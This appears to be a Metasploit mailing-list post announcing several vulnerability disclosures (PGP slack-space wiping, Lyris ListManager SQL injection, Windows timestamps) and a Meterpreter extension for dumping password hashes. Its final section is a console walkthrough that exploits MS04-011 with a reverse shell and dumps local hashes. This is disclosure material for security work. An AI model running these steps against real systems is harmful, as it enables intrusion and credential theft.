<<< Date Index >>>     <<< Thread Index >>>

PGP Wipe Free Space, Lyris ListManager Flaws, Windows Timestamps, Sam Juicer



The Metasploit Project has released three new vulnerability sets and a 
password dumping extension to the Meterpreter payload. Enjoy!

-HD

[ PGP Desktop Wipe Free Space Flaw ]

PGP Desktop includes a Wipe Free Space utility that claims to eliminate 
data in all the free space on your hard drive including the the little 
areas after the end of existing files which may still have old data left 
behind. In short, the utility claims to wipe file slack space, the unused 
space in a disk cluster. The software does not work as advertised. It 
does not clean slack space.
- http://metasploit.com/research/vulns/pgp_slackspace/


[ Lyris ListManager Multiple Flaws ]

The Lyris ListManager software is vulnerable to numerous SQL injection, 
source code dislosure, and authentication bypass flaws. The ListManager 
software runs on Linux, Solaris, and Windows and can be configured to use 
one of the following database backends: PostgreSQL, Oracle, and 
MSSQL/MSDE. These flaws can be used to gain complete access to the 
ListManager data and often the host server itself.
- http://metasploit.com/research/vulns/lyris_listmanager/


[ Windows File Time Stamp Display Flaw ]

Windows file time stamps can be set to extremely low values via the 
NtSetInformationFile() system call. The Windows API does not properly 
translate the low 64-bit time values stored on disk into human readable 
format, and displays no information instead. Although this is not a 
security vulnerability in itself, it adversely affects third-party 
applications that rely upon the Windows API to perform the translation.
- http://metasploit.com/research/vulns/windows_timestamp/

[ Sam Juicer ]

A new extension has been added to the Meterpreter uber-payload in the 
Metasploit Framework. This extension allows you to dump the local Windows 
password hashes from a Meterpreter shell. The password dump is 
accomplished without writing any files to disk, as opposed to any version 
of pwdump available today. The Sam Juicer extension can be obtained via 
'msfupdate' or by downloading the latest snapshot of v2.5 of the 
Metasploit Framework. After successfully exploiting a system with one of 
the 'meterpreter' payloads, run the following commands to load the 
extension and dump the password hashes:

msf lsass_ms04_011(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.0.100:4321 <-> 192.168.0.252:1124
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -=    connected to    =- ]
[ -= meterpreter server =- ]
[ -=    v.  00000500    =- ]
meterpreter>

<< load the Sam extension with the 'use' command >>

meterpreter> use -m Sam
loadlib: Loading library from 'ext551353.dll' on the remote machine.
loadlib: success.

<< use the gethashes command to dump the local password hashes >>

meterpreter> gethashes
Administrator:500:ec6r3a5c0k6mce249053939542f2c6c4:cp6wan5tahdibs94e89e2ffb49f307fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[ snip ]